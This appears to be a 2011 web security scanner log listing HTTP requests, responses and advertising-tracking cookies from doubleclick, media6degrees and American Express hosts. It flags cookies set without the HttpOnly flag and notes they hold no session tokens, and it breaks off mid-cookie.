GET /i.cid?c=333063&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arngjUNZai9A8b6vGqfDNi6rJ1IOrwG1iRfb2mun6UWAcfaZaM71VvOPKvNWAPmPZbMhDIZagUZcZcZdPiDFoZbRXgORrSVcupCRtGZcb2O5dVNPgBgKgCWi9KYAIaErmMnc2YBh9d5ihJseWviuvM0msClZcLSafio3eePFSgZcrofvZdGZcHHY27INY2qQvgOwWk7yqlLnc5J8LvggklYNxxOl7xVwF2ZdCZcHfkIZcTPAGv9LW7cuti18ri2G5nmglac3HHOZcBjfcvaUYbKOYGgRcpLWa5or6KOP9GIVZcEb69ZdZaZaKck6r7q8Zc424boVpx39LS8GTPY086n39wF7XS6BqCG43UqZcBvuiEjBBZaZbpmCZcIA404LZadCp79y6sNyLtllvmxwrJ7ZdvKyn3G0uRMswjtmF2pGQr4eTvVNTWZcAMncJfaLWO6jMPphRt0wQLgSaCbjZc4XaEZcl6WDUXVtosBTptyXFjtZcuPA
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 57470 Expires: Sat, 05 Feb 2011 21:50:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:53 GMT Connection: close Set-Cookie: BIGipServerAXAboutUs_Public=3725306048.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/ HTTP/1.1 Host: about.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 36355 Expires: Sat, 05 Feb 2011 21:50:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 21:50:53 GMT Connection: close Set-Cookie: BIGipServerAXAboutUs_Public=3758860480.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="sm.css" rel="styleshe ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=3013 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1txep00y10010606205; orblb=2lfk1rn0225810u010hlmv2dh10u0100000; rdrlst=41407dpletz4d0000000u10010o2ylebnns0000000y10010mmnlebnns0000000y100110e5lg1nei00000004100110rdlg1vir0000000310010xo1lebnns0000000y10010x1blebnns0000000y10010eh5lf17qf0000000q100106bylemlne0000000w10010w3clebnns0000000y100107gmlebnns0000000y10010jv6lebnns0000000y10010j4ilew2e20000000s10010xthlebnns0000000y10010fullf8gij0000000m100110f6lg1nei0000000410011196lfzx0l00000005100100c9lfk1rn0000000j10010jillebnns0000000y10011194lg3y5y0000000210010fuqlegh2b0000000x10010b6mlf17qk0000000p10010mz1lebnns0000000y10010cajlfk1rn0000000j10010p7vlebnns0000000y100107vglfk1rn0000000j10011192lg5l2h0000000110010xvslebnns0000000y100110ellg1nei0000000410010xuklebnns0000000y10010x1jlebnns0000000y10010jk7lebnns0000000y10010cbnlfk1rn0000000j10010yiplebnns0000000y10010yh0lebnns0000000y10010xwflebnns0000000y10010e4vlebnns0000000y100110e9lg1nei0000000410010jwblfk1rn0000000j10010xwblebnns0000000y1001; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000o10010606205ag2leqh191f41800v1001060620582gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00y100106062055q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300k10010606205820lebnns181qq00e0l000400100b0olfjpei0g7m300k10010606205ab4lebnns1o9ct00y100106062059szlebnns1o9ct00y100106062058wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1p40600x10010606205al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00j100106052057y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300k10010606205b08lfjpei0g7m300k1001060620540slebnns181qq00e0l00040010045mlfdxmc0000000l10010606205a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1ubnn00z10020607206; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxjs0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: rdrlst=4140o2ylebnns0000000z100207dpletz4d0000000v100210e5lg1nei0000000510020mmnlebnns0000000z100210rdlg1vir0000000410020x1blebnns0000000z10020xo1lebnns0000000z10020eh5lf17qf0000000r100206bylemlne0000000x10020w3clebnns0000000z100207gmlebnns0000000z10020jv6lebnns0000000z10020j4ilew2e20000000t10020xthlebnns0000000z10020fullf8gij0000000n100210f6lg1nei0000000510021196lfzx0l00000006100200c9lfk1rn0000000k10020jillebnns0000000z10021194lg3y5y0000000310020fuqlegh2b0000000y10020b6mlf17qk0000000q10020mz1lebnns0000000z10020cajlfk1rn0000000k10020p7vlebnns0000000z100207vglfk1rn0000000k10020xvslebnns0000000z10021192lg5l2h00000002100210ellg1nei0000000510020xuklebnns0000000z10020jk7lebnns0000000z10020x1jlebnns0000000z10020yiplebnns0000000z10020cbnlfk1rn0000000k10020xwflebnns0000000z10020yh0lebnns0000000z10020e4vlebnns0000000z100210e9lg1nei0000000510020xwblebnns0000000z10020jwblfk1rn0000000k1002; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000p1002060720682gletz4d0pqa500a0l000400100ag2leqh191fia600w1002060720682hlebnns1o9ct00z100206072069zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300l10020607206820lebnns181qq00e0l000400100b0olfjpei0g7m300l10020607206ab4lebnns1o9ct00z100206072069szlebnns1o9ct00z100206072068wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pi9400y10020607206al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0g7m300l100206072068bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns1o9ct00k10020606206b08lfjpei0g7m300l1002060720640slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000m1002060720640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Location: http://ad.yieldmanager.com/pixel?t=2&id=702840 Content-Length: 0 Date: Sat, 05 Feb 2011 21:50:02 GMT
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3aa5/3/0/*/v;233997820;0-0;0;57848017;1-468/60;39912829/39930616/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:49 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/2179194/1-HYSA_RateV2_468x60_30k.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0 Content-Type: text/html
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;235229193;58835998;e HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://radioshack.shoplocal.com/radioshack/default.aspx? Set-Cookie: id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:01 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/ Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:50:26 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?id=731976&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://download32.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!?!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#mP>!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#mPA!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#mPD!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#mPG!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#mPJ!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<lx@?!!!#G!#p!r!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<l`]S!!.vL!#p!u!!!/`!$V.-!00Gv!%Bbn!!!!$!?5%!'O+r7!w1K*!'%l)!!j:k!'H85~~~~~<l`GD<l`]S!!.vL"; ih="b!!!!D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!$<lRYo!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/oCq!!!!%<l`JX!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; bh="b!!!$[!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!<@x!!!!%<lSWC!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!#<lja'!!L_w!!!!(<lja'!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!'<lQj,!#,##!!!!'<lSWC!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!(<lja'!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!